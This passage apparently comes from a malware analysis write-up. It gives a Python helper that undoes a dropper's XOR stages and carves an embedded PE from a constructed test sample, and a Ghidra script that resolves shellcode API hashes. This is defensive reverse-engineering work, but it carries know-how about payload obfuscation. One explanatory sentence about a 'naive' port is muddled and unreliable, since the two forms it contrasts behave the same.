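    """Stage-6 style decode: byte[i] ^ i ^ key, truncated to a byte like the C# (byte) cast.
    The transform is an involution, so the same call encodes and decodes."""
    return bytes((b ^ i ^ key) & 0xFF for i, b in enumerate(buf))


def carve_pe(buf, offset, end=None):
    """Slice an embedded PE out of buf, checking 'MZ' and 'PE\\0\\0' first so a wrong
    offset fails loudly instead of producing a garbage file."""
    if buf[offset:offset + 2] != b"MZ":
        raise ValueError("no MZ header at 0x%x" % offset)
    e_lfanew = struct.unpack_from("<I", buf, offset + 0x3C)[0]
    sig = offset + e_lfanew
    if buf[sig:sig + 4] != b"PE\0\0":
        raise ValueError("no PE signature at 0x%x" % sig)
    return buf[offset:end]


def build_fake_pe():
    """Constructed stand-in for a PE: MZ header, e_lfanew = 0x40, 'PE\\0\\0' at 0x40 (84 bytes)."""
    pe = bytearray(b"MZ" + b"\0" * 0x3A)        # 0x3C bytes up to e_lfanew
    pe += struct.pack("<I", 0x40)               # e_lfanew
    pe += b"PE\0\0" + b"STUB" * 4               # signature plus filler
    return bytes(pe)


def build_fake_dropper(payload):
    """Constructed container: junk prefix, payload XORed with 0x45, junk suffix.
    Stands in for mspaint.exe, whose payload sits at 0x409020 for 0xC2E0F bytes."""
    return b"\x90" * 0x20 + xor_single(payload, STAGE1_KEY) + b"\xcc" * 0x10


def recover_chain():
    """Walk the constructed sample through stage-1 decode -> PE carve -> stage-6 round trip."""
    pe = build_fake_pe()
    dropper = build_fake_dropper(pe)
    # stage 1: XOR the known region (here 0x20 .. 0x20+len(pe)) with 0x45
    region = dropper[0x20:0x20 + len(pe)]
    stage1 = xor_single(region, STAGE1_KEY)
    carved = carve_pe(stage1, 0)
    # stage 6: the .NET array transform, applied twice to show it round-trips
    encoded = xor_index(carved)
    decoded = xor_index(encoded)
    return {"carved_ok": carved == pe, "stage6_ok": decoded == carved, "pe_len": len(carved)}


if __name__ == "__main__":
    print(recover_chain())
```

Because xor_index() masks to a byte after XORing with the full index, it behaves identically to the C# loop for arrays longer than 256 bytes, which is the case that a naive `b ^ (i % 256)` port gets wrong only when the key and index bits interact above bit 7.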

#Resolve current highlighted api hash
#@author
#@category _NEW_
#@keybinding ctrl k
#@menupath
#@toolbar
from ghidra.program.model.address import *
from ghidra.program.model.listing import *
from ghidra.program.model.symbol import *
from ghidra.program.model.data import *
from ghidra.program.model.pcode import *
import ghidra.app.services
from jarray import array
import struct

address_factory = currentProgram.getAddressFactory()
datatype_manager = currentProgram.getDataTypeManager()
function_manager = currentProgram.getFunctionManager()


def get_address(address):
    return address_factory.getDefaultAddressSpace().getAddress(address)


def get_data_type(type):
    data_type = datatype_manager.getDataType(datatype_manager.getRootCategory().getCategoryPath(), type)
    assert data_type, 'type not found: %s' % type
    return data_type


def name_hash(name):
    # same hash as the shellcode's doProcessNameHash(): seed 0x2326, times 0x21 per char, 32-bit wrap
    #print ("name_hash:", name)
    res_hash = 8998
    M32 = (1<<32)-1
    for b in name:
        res_hash = (ord(b) + 33 * res_hash) & M32
    return res_hash


def get_data_manager(name):
    # find an open data type archive (e.g. windows_vs12_32) by name
    service = state.getTool().getService(ghidra.app.services.DataTypeManagerService)
    for dm in service.getDataTypeManagers():
        if dm.getName() == name:
            return dm
    return None


# the token highlighted in the decompiler is the hash constant, e.g. 0xea31d3b6
hashVal = int(currentLocation.getTokenName(), 0x10)
dm = get_data_manager('windows_vs12_32')
if dm:
    func_hashes = {}
    # hash every function definition in the archive, then look the constant up
    for dt in dm.getAllDataTypes():
        if not isinstance(dt, FunctionDefinition):
            continue
        func_hashes[name_hash(dt.getName())] = dt
    if func_hashes.get(hashVal) is not None:
        print (func_hashes.get(hashVal))